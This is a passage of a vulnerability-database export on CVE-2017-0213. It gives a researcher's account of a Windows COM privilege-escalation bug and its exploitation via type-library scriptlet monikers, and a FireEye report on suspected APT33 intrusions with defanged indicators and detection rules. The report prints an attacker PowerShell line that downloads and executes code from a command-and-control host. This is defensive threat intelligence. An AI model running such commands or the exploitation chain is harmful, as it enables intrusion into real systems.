"2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2017-06-08T00:00:00", "id": "MYHACK58:62201786826", "href": "http://www.myhack58.com/Article/html/3/62/2017/86826.htm", "cvss": {"score": 1.9, 
"vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T11:56:57", "description": "### Summary:\r\nWhen accessing an OOP COM object using IRemUnknown2 the local unmarshaled proxy can be for a different interface to that requested by QueryInterface, resulting in a type confusion which can result in EoP.\r\n\r\n### Description:\r\n\r\nQuerying for an IID on an OOP (or remote) COM object calls the ORPC method RemQueryInterface or RemQueryInterface2 on the default proxy. This request is passed to the remote object which queries the implementation object and if successful returns a marshaled representation of that interface to the caller. \r\n\r\nThe difference between RemQueryInterface and RemQueryInterface2 (RQI2) is how the objects are passed back to the caller. For RemQueryInterface the interface is passed back as a STDOBJREF which only contains the basic OXID/OID/IPID information to connect back. RemQueryInterface2 on the other hand passes back MInterfacePointer structures, each of which is an entire OBJREF. The rationale, as far as I can tell, is that RQI2 is used for implementing in-process handlers: some interfaces can be marshaled using the standard marshaler and others can be custom marshaled. This is exposed through the Aggregate Standard Marshaler. \r\n\r\nThe bug lies in the implementation of unpacking the results of the RQI2 request in CStdMarshal::Finish_RemQIAndUnmarshal2. For each MInterfacePointer CStdMarshal::UnmarshalInterface is called passing the IID of the expected interface and the binary data wrapped in an IStream. CStdMarshal::UnmarshalInterface blindly unmarshals the interface, which creates a local proxy object, but the proxy is created for the IID in the OBJREF stream and NOT the IID requested in RQI2. No further verification occurs at this point and the created proxy is passed back up the call stack until it is received by the caller (through a void** obviously). 
\r\n\r\nIf the IID in the OBJREF doesn\u2019t match the IID requested, the caller doesn\u2019t know; if it calls any methods on the expected interface it will be calling a type confused object. This could result in crashes in the caller when it tries to access methods on the expected interface which aren\u2019t there or are implemented differently. You could probably also return a standard OBJREF to an object local to the caller; this will result in returning the local object itself, which might have more scope for exploiting the type confusion. In order to get the caller to use RQI2 we just need to pass it back an object which is custom marshaled with the Aggregate Standard Marshaler. This will set a flag on the marshaler which indicates to always use the aggregate marshaler, which results in using RQI2 instead of RQI. As this class is a core component of COM it\u2019s trusted and so isn\u2019t affected by the EOAC_NO_CUSTOM_MARSHAL setting.\r\n\r\nIn order to exploit this a different caller needs to call QueryInterface on an object under a less trusted user's control. This could be a more privileged user (such as a sandbox broker), or a privileged service. This is a pretty easy pattern to find: any method in an exposed interface on a more trusted COM object which takes an interface pointer or variant would potentially be vulnerable. For example IPersistStream takes an IStream interface pointer and will call methods on it. Another type of method is one of the various notification interfaces such as IBackgroundCopyCallback for BITS. This can probably also be used remotely if the attacker has the opportunity to inject an OBJREF stream into a connection which is set to CONNECT level security (which seems to be the default activation security). 
\r\n\r\nOn to exploitation. As you well know I\u2019ve little interest in exploiting memory corruptions, especially as this would either trigger CFG on modern systems or would require a very precise lineup of expected method and actual called method, which could be tricky to exploit reliably. However I think at least for using this to escape a sandbox it might be your only option. So I\u2019m not going to do that; instead I\u2019m going to exploit it logically. The only problem is this is probably unexploitable from a sandbox (maybe) and requires a very specific type of callback into our object. \r\n\r\nThe thing I\u2019m going to exploit is in the handling of OLE Automation auto-proxy creation from type libraries. When you implement an Automation compatible object you could implement an explicit proxy, but if you\u2019ve already got a Type library built from your IDL then OLEAUT32 provides an alternative. If you register your interface with a Proxy CLSID for PSOAInterface or PSDispatch then instead of loading your PS DLL it will load OLEAUT32. The proxy loader code will look up the interface entry for the passed IID to see if there\u2019s a registered type library associated with it. If there is, the code will call LoadTypeLib on that library and look up the interface entry in the type library. It will then construct a custom proxy object based on the type library information. \r\n\r\nThe trick here is that while in general we don\u2019t control the location of the type library (so it\u2019s probably in a location we can write to such as system32), if we can get an object unmarshaled which indicates its IID is one of these auto-proxy interfaces while the privileged service is impersonating us, we can redirect the C: drive to anywhere we like and so get the service to load an arbitrary type library file instead of the system one. One easy place where this exact scenario occurs is in the aforementioned BITS SetNotifyInterface function. 
The service first impersonates the caller before calling QI on the notify interface. We can then return an OBJREF for an automation IID even though the service asked for a BITS callback interface.\r\n\r\nSo what? Well it\u2019s been known for almost 10 years that the Type library file format is completely unsafe. It was reported and it wasn\u2019t changed; Tombkeeper highlighted this in his \u201cSexrets [sic] of LoadLibrary\u201d presentation at CSW 2015. You can craft a TLB which will directly control EIP. Now you\u2019d assume therefore I\u2019m trading an unreliable way of getting EIP control for one which is much easier; if you assume that you\u2019d be wrong. Instead I\u2019m going to abuse the fact that TLBs can have referenced type libraries, which is used instead of embedding the type definitions inside the TLB itself. When a referenced type is loaded the loader will try and look up the TLB by its GUID; if that fails it will take the filename string and pass it verbatim to LoadTypeLib. It\u2019s a lesser-known fact that this function, if it fails to find a file with the correct name, will try and parse the name as a moniker. Therefore we can insert a scriptlet moniker into the type library: when the auto-proxy generator tries to find how many functions the interface implements it walks the inheritance chain, which causes the referenced TLB to be loaded, which causes a scriptlet moniker to be loaded and bound, which results in arbitrary execution in a scripting language inside the privileged COM caller. \r\n\r\nThe need to replace the C: drive is why this won\u2019t work as a sandbox escape. Also it's a more general technique, not specific to this vulnerability as such; you could exploit it in the low-level NDR marshaler layer, however it\u2019s rare to find something impersonating the caller during the low-level unmarshal. Type libraries are not loaded using the flag added after CVE-2015-1644 which prevents DLLs being loaded from the impersonated device map. 
I think you might want to fix this as well as there are other places and scenarios where this can occur; for example there are a number of WMI services (such as anything which touches GPOs) which result in the ActiveDS COM object being created, which is automation compatible and so will load a type library while impersonating the caller. Perhaps the auto-proxy generator should temporarily disable impersonation when loading the type library to prevent this happening. \r\n\r\n### Technologies Affected\r\n* Microsoft Windows 10 Version 1607 for 32-bit Systems\r\n* Microsoft Windows 10 Version 1607 for x64-based Systems\r\n* Microsoft Windows 10 for 32-bit Systems\r\n* Microsoft Windows 10 for x64-based Systems\r\n* Microsoft Windows 10 version 1511 for 32-bit Systems\r\n* Microsoft Windows 10 version 1511 for x64-based Systems\r\n* Microsoft Windows 10 version 1703 for 32-bit Systems\r\n* Microsoft Windows 10 version 1703 for x64-based Systems\r\n* Microsoft Windows 7 for 32-bit Systems SP1\r\n* Microsoft Windows 7 for x64-based Systems SP1\r\n* Microsoft Windows 8.1 for 32-bit Systems\r\n* Microsoft Windows 8.1 for x64-based Systems\r\n* Microsoft Windows RT 8.1\r\n* Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\r\n* Microsoft Windows Server 2008 R2 for x64-based Systems SP1\r\n* Microsoft Windows Server 2008 for 32-bit Systems SP2\r\n* Microsoft Windows Server 2008 for Itanium-based Systems SP2\r\n* Microsoft Windows Server 2008 for x64-based Systems SP2\r\n* Microsoft Windows Server 2012\r\n* Microsoft Windows Server 2012 R2\r\n* Microsoft Windows Server 2016\r\n\r\n### Proof of Concept\r\n`https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213`", "cvss3": {}, "published": "2017-07-04T00:00:00", "type": "seebug", "title": "Microsoft Windows COM Local Privilege Escalation Vulnerability(CVE-2017-0213)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1644", "CVE-2017-0213"], "modified": "2017-07-04T00:00:00", "href": 
"https://www.seebug.org/vuldb/ssvid-96267", "id": "SSV:96267", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2019-01-27T23:01:52", "description": "#### Introduction\n\nFireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's [Managed Defense](<https://www.fireeye.com/solutions/managed-defense.html>) has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.\n\nOn Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity [targeting Energy and Aerospace industries](<https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html>). Recent public reporting indicated possible links between the confirmed APT33 spear phishing and [destructive SHAMOON attacks](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/>); however, we were unable to independently verify this claim. FireEye\u2019s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. 
Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.\n\n> 45 days ago, during 24x7 monitoring, [#ManagedDefense](<https://twitter.com/hashtag/ManagedDefense?src=hash&ref_src=twsrc%5Etfw>) detected & contained an attempted intrusion from newly-identified adversary infrastructure*. \n \nIt is C2 for a code family we track as POWERTON. \n \n*hxxps://103.236.149[.]100/api/info\n> \n> \u2014 FireEye (@FireEye) [December 15, 2018](<https://twitter.com/FireEye/status/1073744224510722048?ref_src=twsrc%5Etfw>)\n\n#### Identifying the Overlap in Threat Activity\n\nFireEye augments our expertise with an [internally-developed similarity engine](<https://www.camlis.org/matthew-berninger/>) to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. 
This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is [available within our intelligence portal](<https://intelligence.fireeye.com/reports/18-00021316>). To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.\n\n#### Managed Defense Rapid Responses: Investigating the Attacker\n\nIn mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost\u2019s [RULER](<https://github.com/sensepost/ruler>), to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\\outlook\\live.exe (MD5: _95f3bea43338addc1ad951cd2d42eb6f_).\n\nThe payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system\u2019s architecture, downloaded the appropriate variant of PowerSploit (MD5: _c326f156657d1c41a9c387415bf779d4_ or _0564706ec38d15e981f71eaf474d0ab8_), and reflectively loaded PUPYRAT (MD5: _94cd86a0a4d747472c2b3f1bc3279d77_ or _17587668AC577FCE0B278420B8EB72AC_). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.\n\nFireEye collected 168 PUPYRAT samples for a comparison. 
While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor\u2019s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.\n\nIn mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER\u2019s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users\u2019 Outlook client homepages for code execution and persistence. These methods are further explored in this post in the \"RULER In-The-Wild\" section.\n\nThe actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.\n\nDuring the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. 
One example is shown in Figure 1.\n\n \nFigure 1: Attacker\u2019s homepage exploit (CVE-2017-11774)\n\nThe main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named \u201cMedia.ps1\u201d within the user\u2019s %LOCALAPPDATA% directory (%LOCALAPPDATA%\\MediaWs\\Media.ps1) as shown in Figure 2.\n\n \nFigure 2: Attacker\u2019s \u201cMedia.ps1\u201d script\n\nThe purpose of \u201cMedia.ps1\u201d was to decode and execute the downloaded binary payload, which was written to disk as \u201cC:\\Users\\Public\\Downloads\\log.dat\u201d. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.\n\nAnalysis of the \u201clog.dat\u201d payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:\n\n * Username and domain\n * Computer name\n * CPU details\n * Current exe PID\n * Configured C2 server\n\nThe C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned \u201cMedia.ps1\u201d PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. 
During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.\n\nPOSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success interacting with POWERTON during this time. The actor was able to download and establish persistence for an AutoIt binary named \u201cClouldPackage.exe\u201d (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON \u201cpersist\u201d command. The sole functionality of \u201cClouldPackage.exe\u201d was to execute the following line of PowerShell code:\n\n```powershell\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')\n```\n\nThe purpose of this code is to retrieve \u201csilent mode\u201d POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.\n\nStarting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of \u201cindex.html\u201d were identified during this period. 
Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.\n\nFigure 3: OS-specific POSHC2 Downloader\n\nFigure 3 shows that the actor made some minor changes, such as encoding the PowerShell \"DownloadString\" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to \u201cVision.ps1\u201d. During this August 2018 activity, the POSHC2 variants were configured with a \u201ckill date\u201d of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time and this functionality is built into the framework.\n\nOnce again, POSHC2 was used to download a new variant of POWERTON (MD5: _c38069d0bc79acdc28af3820c1123e53_), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.\n\nDue to Managed Defense\u2019s early containment of these intrusions, we were unable to ascertain the actor\u2019s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim\u2019s network.\n\n#### Adversary Pursuit: Infrastructure Monitoring\n\nAdvanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 
11, 2018, the adversary changed the payload (MD5: _8be06571e915ae3f76901d52068e3498_) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: _4047e238bbcec147f8b97d849ef40ce5_). This specific URL was identified in a [public discussion](<https://twitter.com/KseProso/status/1073169197541281792>) as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.\n\nOn Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: _f0fe6e9dde998907af76d91ba8f68a05_). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: _53ae59ed03fa5df3bf738bc0775a91d9_).\n\nTable 1 contains the operational timeline for the activity we analyzed.\n\n**DATE/TIME (UTC)** | **NOTE** | **INDICATOR**\n---|---|---\n2017-08-15 17:06:59 | APT33 \u2013 EMPIRE (Used) | 8a99624d224ab3378598b9895660c890\n2017-09-15 16:49:59 | APT33 \u2013 PUPYRAT (Compiled) | 4b19bccc25750f49c2c1bb462509f84e\n2017-11-12 20:42:43 | GroupA \u2013 AUT2EXE Downloader (Compiled) | 95f3bea43338addc1ad951cd2d42eb6f\n2017-11-14 14:55:14 | GroupA \u2013 PUPYRAT (Used) | 17587668ac577fce0b278420b8eb72ac\n2018-01-09 19:15:16 | APT33 \u2013 PUPYRAT (Compiled) | 56f5891f065494fdbb2693cfc9bce9ae\n2018-02-13 13:35:06 | APT33 \u2013 PUPYRAT (Used) | 56f5891f065494fdbb2693cfc9bce9ae\n2018-05-09 18:28:43 | GroupB \u2013 AUT2EXE (Compiled) | 46038aa5b21b940099b0db413fa62687\n2018-07-02 07:57:40 | APT33 \u2013 POSHC2 (Used) | fa7790abe9ee40556fb3c5524388de0b\n2018-07-16 00:33:01 | GroupB \u2013 POSHC2 (Compiled) | 75e680d5fddbdb989812c7ba83e7c425\n2018-07-16 01:39:58 | GroupB \u2013 POSHC2 (Used) | 75e680d5fddbdb989812c7ba83e7c425\n2018-07-16 08:36:13 | GroupB \u2013 POWERTON (Used) | 46038aa5b21b940099b0db413fa62687\n2018-07-31 22:09:25 | APT33 \u2013 POSHC2 (Used) | 129c296c363b6d9da0102aa03878ca7f\n2018-08-06 16:27:05 | GroupB \u2013 POSHC2 (Compiled) | fca0ad319bf8e63431eb468603d50eff\n2018-08-07 05:10:05 | GroupB \u2013 POSHC2 (Used) | 75e680d5fddbdb989812c7ba83e7c425\n2018-08-29 18:14:18 | APT33 \u2013 POSHC2 (Used) | 5832f708fd860c88cbdc088acecec4ea\n2018-10-09 16:02:55 | APT33 \u2013 POSHC2 (Used) | 8d3fe1973183e1d3b0dbec31be8ee9dd\n2018-10-09 16:48:09 | APT33 \u2013 POSHC2 (Used) | 48d1ed9870ed40c224e50a11bf3523f8\n2018-10-11 21:29:22 | GroupB \u2013 POWERTON (Used) | 8be06571e915ae3f76901d52068e3498\n2018-12-13 11:00:00 | GroupB \u2013 POWERTON (Identified) | 99649d58c0d502b2dfada02124b1504c\n\nTable 1: Operational Timeline\n\n#### Outlook and Implications\n\nIf the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.\n\nWe will continue to track these clusters independently until we achieve high confidence that they are the same. 
The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.\n\n#### Custom Backdoor: POWERTON\n\nPOWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including [WMI](<https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html>) and auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for communication traffic to and from the C2. 
POWERTON typically gets deployed as a later stage backdoor and is obfuscated with several layers.\n\nFireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.\n\nTable 2 contains samples of POWERTON.\n\n**Hash of Obfuscated File (MD5)** | **Hash of Deobfuscated File (MD5)** | **Version**\n---|---|---\n**974b999186ff434bee3ab6d61411731f** | 3871aac486ba79215f2155f32d581dc2 | V1\n**e2d60bb6e3e67591e13b6a8178d89736** | 2cd286711151efb61a15e2e11736d7d2 | V1\n**bd80fcf5e70a0677ba94b3f7c011440e** | 5a66480e100d4f14e12fceb60e91371d | V1\n**4047e238bbcec147f8b97d849ef40ce5** | f5ac89d406e698e169ba34fea59a780e | V2\n**c38069d0bc79acdc28af3820c1123e53** | 4aca006b9afe85b1f11314b39ee270f7 | V2\n**N/A** | 7f4f7e307a11f121d8659ca98bc8ba56 | V2\n**53ae59ed03fa5df3bf738bc0775a91d9** | 99649d58c0d502b2dfada02124b1504c | V2\n\nTable 2: POWERTON malware samples\n\n#### Adversary Methods: Email Exploitation on the Rise\n\nOutlook and Exchange are synonymous with email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for its users, those systems become intrusion vectors. 
FireEye has observed an increase in [targeted adversaries challenging and subverting security controls on Exchange and Office365.](<https://summit.fireeye.com/content/fireeye-summit/en_US/learn/tracks.html#technical-3>) Our Mandiant consultants also presented [several new methods used by adversaries to subvert multifactor authentication](<https://summit.fireeye.com/learn/tracks.html#technical-8>) at FireEye Cyber Defense Summit 2018.\n\nAt FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.\n\nAn adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:\n\n * Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. 
Did they re-use that password?\n * Previous compromise within your organization where credentials were compromised but not identified or reset.\n * Poor password choice or password security policies resulting in brute-forced credentials.\n * Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via [documents](<https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/>) intended to phish them from users.\n * Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.\n\nOnce the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange\u2019s legitimate features.\n\n#### RULER In-The-Wild: Here, There, and Everywhere\n\nSensePost\u2019s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the \"Managed Defense Rapid Responses\" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. 
This communication retrieved an executable created with _Aut2Exe_ (MD5: _95f3bea43338addc1ad951cd2d42eb6f)_, and executed a PowerShell one-liner to retrieve further malicious content.\n\nWithout the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:\n\n * Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.\n * The transfer of _95f3bea43338addc1ad951cd2d42eb6f_ was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that [WebDAV hosted payload](<https://github.com/sensepost/ruler/wiki/Rules#webdav>).\n * The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be \"locally\" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's [initial write-up](<https://silentbreaksecurity.com/malicious-outlook-rules/>) prior to RULER\u2019s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. 
WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.\n * The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. _95f3bea43338addc1ad951cd2d42eb6f_ does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.\n\nWith that in mind, the initial infection vector is illustrated in Figure 4.\n\n \nFigure 4: Initial infection vector\n\nAs both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible [disclosure of CVE-2017-11774](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11774>) was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker\u2019s perspective, [refer to SensePost's blog](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>).\n\nFireEye [has observed](<https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf>) and [documented](<https://twitter.com/ItsReallyNick/status/1014522001900306433>) an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. 
This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.\n\nUnderstanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend the organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. 
Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost\u2019s RULER.\n\n**Microsoft Outlook Security Update** | **RULER Module Addressed**\n---|---\n[June 13, 2017 Security Update](<https://support.microsoft.com/en-us/help/3191938/descriptionofthesecurityupdateforoutlook2013june13-2017>) | [RULER.RULES](<https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/>)\n[September 12, 2017 Security Update](<https://support.microsoft.com/en-us/help/4011091/descriptionofthesecurityupdateforoutlook2016september12-2017>) | [RULER.FORMS](<https://sensepost.com/blog/2017/outlook-forms-and-shells/>)\n[October 10, 2017 Security Update](<https://support.microsoft.com/en-us/help/4011162/description-of-the-security-update-for-outlook-2016-october-10-2017>) | [RULER.HOMEPAGE](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>)\n\nTable 3: Outlook attack surface mitigations\n\n#### Detecting the Techniques\n\nFireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. 
Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.\n\n**PLATFORM** | **SIGNATURE NAME**\n---|---\nEndpoint Security | POWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY)<br>SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)<br>MIMIKATZ (CREDENTIAL STEALER)<br>RULER OUTLOOK PERSISTENCE (UTILITY)\nNetwork and Email Security | FE_Exploit_HTML_CVE201711774<br>FE_HackTool_Win_RULER<br>FE_HackTool_Linux_RULER<br>FE_HackTool_OSX_RULER<br>FE_Trojan_OLE_RULER<br>HackTool.RULER (Network Traffic)\n\nTable 4: FireEye product detections\n\nFor organizations interested in hunting for Outlook home page shell and persistence, we\u2019ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:\n\n```yara\nrule Hunting_Outlook_Homepage_Shell_and_Persistence\n{\n    meta:\n        author = \"Nick Carr (@itsreallynick)\"\n        reference_hash = \"506fe019d48ff23fac8ae3b6dd754f6e\"\n    strings:\n        $script_1 = \"<htm\" ascii nocase wide\n        $script_2 = \"<script\" ascii nocase wide\n        $viewctl1_a = \"ViewCtl1\" ascii nocase wide\n        $viewctl1_b = \"0006F063-0000-0000-C000-000000000046\" ascii wide\n        $viewctl1_c = \".OutlookApplication\" ascii nocase wide\n    condition:\n        uint16(0) != 0x5A4D and all of ($script*) and any of 